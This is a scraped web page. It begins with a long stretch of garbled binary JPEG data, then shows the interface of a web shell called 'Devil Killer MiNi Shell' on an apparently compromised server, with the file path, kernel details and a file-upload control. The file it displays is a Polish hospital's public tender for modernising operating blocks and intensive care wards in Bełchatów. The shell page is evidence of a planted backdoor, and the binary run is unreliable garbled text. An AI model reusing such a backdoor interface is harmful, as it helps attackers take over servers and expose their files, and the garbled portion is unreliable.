JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20171031/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20171031/609705-N-2017.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 609705-N-2017 z dnia 2017-10-31 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Szpital Wojewódzki im. Jana Pawła II w Bełchatowie</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Wykonanie robót budowlanych w związku z realizacją zadania o nazwie ,,Poprawa dostępności i jakości usług zdrowotnych świadczonych na rzecz mieszkańców województwa łódzkiego poprzez modernizację, przebudowę i doposażenie Bloków Operacyjnych oraz Oddziałów Anestezjologicznych i Intensywnej Terapii w Szpitalu Wojewódzkim im. Jana Pawła II w Bełchatowie"</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">,,Poprawa dostępności i jakości usług zdrowotnych świadczonych na rzecz mieszkańców województwa łódzkiego poprzez modernizację, przebudowę i doposażenie Bloków Operacyjnych oraz Oddziałów Anestezjologicznych i Intensywnej Terapii w Szpitalu Wojewódzkim im. Jana Pawła II w Bełchatowie"</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Szpital Wojewódzki im. Jana Pawła II w Bełchatowie</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">000306503</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Czapliniecka</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">123</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">97-400 </span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Bełchatów</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">łódzkie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">44 63 58 236, 44 63 58 208, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">z.publiczne@szpital-belchatow.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">44 63 58 208</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.szpital-belchatow.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Podmiot prawa publicznego</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia"></span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.szpital-belchatow.pl </span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Wykonawca zobowiązany jest złożyć ofertę w formie pisemnej </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Szpital Wojewódzki im. Jana Pawła II, 97-400 Bełchatów, ul. Czapliniecka 123</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Wykonanie robót budowlanych w związku z realizacją zadania o nazwie ,,Poprawa dostępności i jakości usług zdrowotnych świadczonych na rzecz mieszkańców województwa łódzkiego poprzez modernizację, przebudowę i doposażenie Bloków Operacyjnych oraz Oddziałów Anestezjologicznych i Intensywnej Terapii w Szpitalu Wojewódzkim im. Jana Pawła II w Bełchatowie"</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">GZP/3800/36/2017</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1. Przedmiotem zamówienia jest wykonanie robót budowlanych w związku z realizacją zadania o nazwie ,,Poprawa dostępności i jakości usług zdrowotnych świadczonych na rzecz mieszkańców województwa łódzkiego poprzez modernizację, przebudowę i doposażenie Bloków Operacyjnych oraz Oddziałów Anestezjologicznych i Intensywnej Terapii w Szpitalu Wojewódzkim im. Jana Pawła II w Bełchatowie".Zadanie stanowiące przedmiot niniejszego zamówienia realizowane jest na podstawie projektu nr WND RPLD.07.02.00-10-0042/17 współfinansowanego przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego Województwa Łódzkiego na lata 2014-2020.2. Kody i nazwy według Wspólnego Słownika Zamówień (CPV):Kod główny:	45000000-7 Roboty budowlaneKody dodatkowe:45100000-8 Przygotowanie terenów pod budowę45200000-9 Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części45215140-0 Roboty budowlane w zakresie obiektów szpitalnych45111300-1 Roboty rozbiórkowe45400000-1 Roboty wykończeniowe w zakresie obiektów budowlanych45111100-9 Roboty w zakresie burzenia45262520-2 Roboty murarskie45320000-6 Izolacje przeciwwilgociowe45321000-3 Izolacje termiczne45432210-9 Elementy z płyt g.-k.45410000-4 Roboty tynkarskie45421146-9 Montaż sufitów podwieszanych45431200-9 Okładziny ścienne45421000-4 Stolarka budowlana45421160-3 Ślusarka budowlana45432100-5 Podłogi i posadzki45442100-8 Roboty malarskie45232460-4 Roboty sanitarne45332200-5 Roboty instalacyjne hydrauliczne45232141-2 Roboty grzewcze45331100-7 Instalowanie centralnego ogrzewania45300000-0 Roboty w zakresie instalacji budowlanych45311100-1 Roboty w zakresie przewodów instalacji elektrycznych oraz opraw elektrycznych45312311-0 Instalacje oświetlenia45316000-5 Instalowanie systemów oświetleniowych i sygnalizacyjnych32000000-3 Sprzęt i aparatura radiowa, telewizyjna, komunikacyjna, telekomunikacyjna i podobna32400000-7 Sieci32410000-0 Lokalna sieć komputerowa32421000-0 Okablowanie sieciowe32423000-4 Gniazda sieciowe32424000-1 Infrastruktura sieciowa32500000-8 Urządzenia i artykuły telekomunikacyjne32520000-4 Sprzęt i kable telekomunikacyjne32521000-1 Kable telekomunikacyjne45300000-0 Roboty w zakresie instalacji budowlanych45310000-3 Roboty w zakresie instalacji elektrycznych45311100-1 Roboty w zakresie przewodów instalacji elektrycznych45314200-3 Instalowanie infrastruktury kablowej45314310-7 Instalowanie okablowania komputerowego32000000-3 Sprzęt i aparatura radiowa, telewizyjna, komunikacyjna, telekomunikacyjna i podobna32200000-5 Aparatura transmisyjna do radiotelefonii, radiotelegrafii, transmisji radiowej i telewizyjnej32230000-4 Radiowa aparatura nadawcza z aparaturą odbiorczą32231000-1 Aparatura telewizyjna o obwodzie zamkniętym32234000-2 Kamery telewizyjne o obwodzie zamkniętym32235000-9 Systemy nadzoru o obwodzie zamkniętym32320000-2 Sprzęt telewizyjny i audiowizualny32323100-4 Kolorowe monitory wideo32330000-5 Aparatura do nagrywania i powielania dźwięku i obrazu wideo32333100-7 Rejestratory obrazu wideo	45333000-0 Roboty instalacyjne gazowe45331200-8 Instalowanie urządzeń wentylacyjnych i klimatyzacyjnych45231110-9 Roboty budowlane w zakresie kładzenia rurociągów45232000-2 Roboty pomocnicze w zakresie rurociągów i kabli45321000-3 Izolacje cieplne45442200-9 Nakładanie powłok antykorozyjnych45450000-6 Roboty budowlane wykończeniowe i pozostałe3. Opis, wielkość lub zakres przedmiotu zamówienia:1) Przedmiot zamówienia obejmuje następujący zakres robót (etapy):a)	Etap I - modernizacja istniejącej sali operacyjno-zabiegowej wraz z pomieszczeniami pomocniczymi w Oddziale chirurgicznym dla dzieci, poprzez wykonanie przebudowy budynku polegającej na adaptacji istniejących pomieszczeń na potrzeby bloku operacyjnego oddziału zgodnie z projektami budowlanymi, które stanowią Załącznik nr 13a do SIWZ. Podstawowe dane dotyczące Bloku operacyjnego na Oddziale Chirurgii dziecięcej:- Powierzchnia użytkowa 187,18 m2- Kubatura 542,82 m3- Wysokość kondygnacji w świetle 2,90 do 2,93 m- Wysokość w świetle stropu podwieszonego do 2,50 mIstniejący zespół operacyjno-zabiegowy Oddziału chirurgicznego dla dzieci (podlegający przebudowie) zlokalizowany jest na wysokim parterze budynku szpitala. Budynek jak większość budynków w Szpitalu wykonany w technologii prefabrykowanej, szkieletowej - konstrukcję stanowi rama ,,H" w układzie poprzecznym. Stropy ,,AKERMANA" grub. 25 cm. Budynki nakryte są dachem z płyt dachowych korytkowych, dach jest pogrążony, kryty papą. Stropy między-kondygnacyjne ceramiczne ,,Akermana" oraz fragmentami monolityczne żelbetowe gr. 13 cm , oparte na ramach ,,H" .Ściany zewnętrzne budynku - gr. 32, 38, 47 cm z cegły, siporeksu, pianobetonu. Ściany wewnętrzne gr.7, 12, 24, 38 cm z siporeksu lub cegły, i żelbetowe gr. 30 cm Wysokość kondygnacji w świetle wynosi 2,90 do 2,93 m, oraz miejscowo 3, 10 m Budynek znajdują się w dobrym stanie technicznym i nadaje się do przebudowy.b)	Etap II - modernizacja istniejącej Sali operacyjno-zabiegowej wraz z pomieszczeniami pomocniczymi w Oddziale otorynolaryngologicznym, poprzez wykonanie przebudowy budynku polegającej na adaptacji istniejących pomieszczeń na potrzeby bloku operacyjnego oddziału, zgodnie z projektami budowlanymi, które stanowią Załącznik nr 13b do SIWZ. Podstawowe dane dotyczące Bloku operacyjnego na Oddziale otorynolaryngologii:- Powierzchnia użytkowa 183,37 m2- Kubatura 535,44 m3- Wysokość kondygnacji w świetle 2,90 do 2,98 m- Wysokość w świetle stropu podwieszonego 2,50 mIstniejący zespół operacyjno-zabiegowy Oddziału otorynolaryngologicznego (podlegający przebudowie) zlokalizowany jest na 6 piętrze budynku głównego Szpitala. Obiekt wykonany w technologii prefabrykowanej, szkieletowej - konstrukcję stanowi rama ,,H" w układzie poprzecznym. Stropy ,,AKERMANA" grub. 25 cm. Budynek nakryty jest dachem z płyt dachowych korytkowych, dach jest pogrążony, kryty papą. Stropy między-kondygnacyjne ceramiczne ,,Akermana" oraz fragmentami monolityczne żelbetowe gr. 13 cm , oparte na ramach ,,H" .Ściany zewnętrzne budynku - gr. 32, 38, 47 cm z cegły, siporeksu, pianobetonu. Ściany wewnętrzne gr.7, 12, 24, 38 cm z siporeksu lub cegły, i żelbetowe gr. 30 cm Wysokość kondygnacji w świetle wynosi 2,90 do 2,98 m, oraz miejscowo 3,10 m Budynek w którym znajduje się Oddział otorynolaryngologiczny jest w dobrym stanie technicznym, nadającym się do przebudowy.c)	Etap III - dostosowanie pomieszczeń Istniejącego Zakładu Rehabilitacji Leczniczej do potrzeb Oddziału anestezjologii i intensywnej terapii poprzez, wykonanie przebudowy budynku polegającej na adaptacji istniejących pomieszczeń na potrzeby Oddziału, zgodnie z projektami budowlanymi, które stanowią Załącznik nr 13c do SIWZ.Podstawowe dane dotyczące Bloku operacyjnego na Oddziale anestezjologii i intensywnej terapii:- Powierzchnia użytkowa 534, 8 m2- Kubatura 1561,6 m3- Wysokość kondygnacji w świetle 2,90 do 2,93 m- Wysokość w świetle stropu podwieszonego 2,20 do 2,50 mOddział Anestezjologii i intensywnej terapii będzie zlokalizowany na I piętrze (obecnie powierzchnię zajmuje Zakład rehabilitacji leczniczej). Budynek wykonany w technologii prefabrykowanej, szkieletowej - konstrukcję stanowi rama ,,H" w układzie poprzecznym. Stropy ,,AKERMANA" grub. 25 cm. Budynek nakryty dachem z płyt dachowych korytkowych, dach jest pogrążony, kryty papą. Stropy między-kondygnacyjne ceramiczne ,,Akermana", fragmentami monolityczno żelbetowe gr. 13 cm , oparte na ramach ,,H" Ściany zewnętrzne budynku - gr. 32, 38, 47 cm z cegły, siporeksu, pianobetonu. Ściany wewnętrzne gr.7, 12, 24, 38 cm z siporeksu lub cegły, i żelbetowe gr. 30 cm. Wysokość kondygnacji w świetle wynosi 2,90 m do 2,93 m, oraz miejscowo 3, 10 m Budynek znajdują się w dobrym stanie technicznym i nadaje się do przebudowy.d)	Etap IV - rozbudowa głównego Bloku operacyjnego o powierzchnię obecnie zajmowaną przez Oddział anestezjologii i intensywnej terapii i budowę 6 sal operacyjnych, poprzez wykonanie przebudowy budynku polegającej na adaptacji istniejących pomieszczeń na potrzeby głównego Bloku operacyjnego, zgodnie z projektami budowlanymi, które stanowią Załącznik nr 13d do SIWZ. Podstawowe dane dotyczące głównego Bloku operacyjnego:- Powierzchnia użytkowa Bloku operacyjnego - 1221,3 m2- Powierzchnia użytkowa pom. tech. - 3,30 m - 320,0 m2- Kubatura Bloku operacyjnego - 4280,0 m3- Wysokość kondygnacji w świetle - 2,93 - 3,10 m- Wysokość w świetle stropu podwieszonego - 2,50; 2,70 mModernizowany Blok operacyjny znajduje się na wysokim parterze /poziom 0,00/ Budynek jak większość obiektów w Szpitalu wykonany w technologii prefabrykowanej, szkieletowej, konstrukcje stanowią ramy ,,H" w układzie poprzecznym. Stropy AKERMANA /25 cm/. Budynek nakryty dachem z płyt dachowych korytkowych, dach pogrążony, kryty papą. Stropy między-kondygnacyjne ceramiczne Akermana, fragmentami monolityczno żelbetowe gr. 13 cm. oparty na ramach ,,H" Ściany zewnętrzne budynku - gr. 32, 38, 47 cm z cegły, siporeksu, pianobetonu. Ściany wewnętrzne gr.7, 12, 24, 38 cm z siporeksu lub cegły, i żelbetowe gr. 30 cm. Wysokość kondygnacji w świetle wynosi 2,93 miejscowo 3,10 m. Budynek znajdują się w dobrym stanie technicznym i nadają się do rozbudowy i przebudowy.2) Autorzy opracowań projektowych: - Projekt architektoniczno-budowlany mgr inż. arch. Witold Mechowski mgr inż. arch. Joanna Woźniak Wacławiak- Projekt konstrukcji mgr inż. Tomasz Kuźma- Projekt instalacji wod-kan. i co. mgr inż. Łukasz Grzymski- Projekt instalacji klimatyzacji i wentylacji mgr inż. Piotr Ściegienka- Projekt instalacji elektrycznych inż. Jerzy Jagas- Projekt gazów medycznych mgr inż. Hubert Górka- Projekt technologii technolog medyczny Agata Ślęczkowska mgr inż. arch. Joanna Woźniak - Wacławiak3) Obszar inwestycji zlokalizowany jest w Bełchatowie przy ul. Czaplinieckiej 123 (obiekty	Szpitala Wojewódzkiego im. Jana Pawła II w Bełchatowie, nr działki 253/6 obręb 3). 4) Informacje na temat istniejących w Szpitalu sieci i przyłączy. Budynek szpitala wyposażony jest w następujące media:a) woda zimnab) ogrzewanie c.o. i c.w.c) instalacja elektryczna - (trzy stacje ,,trafo" na terenie działki szpitala)d) zasilanie energetyczne rezerwowee) kanalizacja sanitarnaf) kanalizacje deszczowag) instalacja telekomunikacyjnah) instalacja strukturalna (informatyczna)i) instalacja p.poż.j) instalacja system oświetlenia awaryjnegok) instalacja gazów medycznych5)	Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia zgodnie z warunkami przetargu, dokumentacją projektowo-kosztorysową, 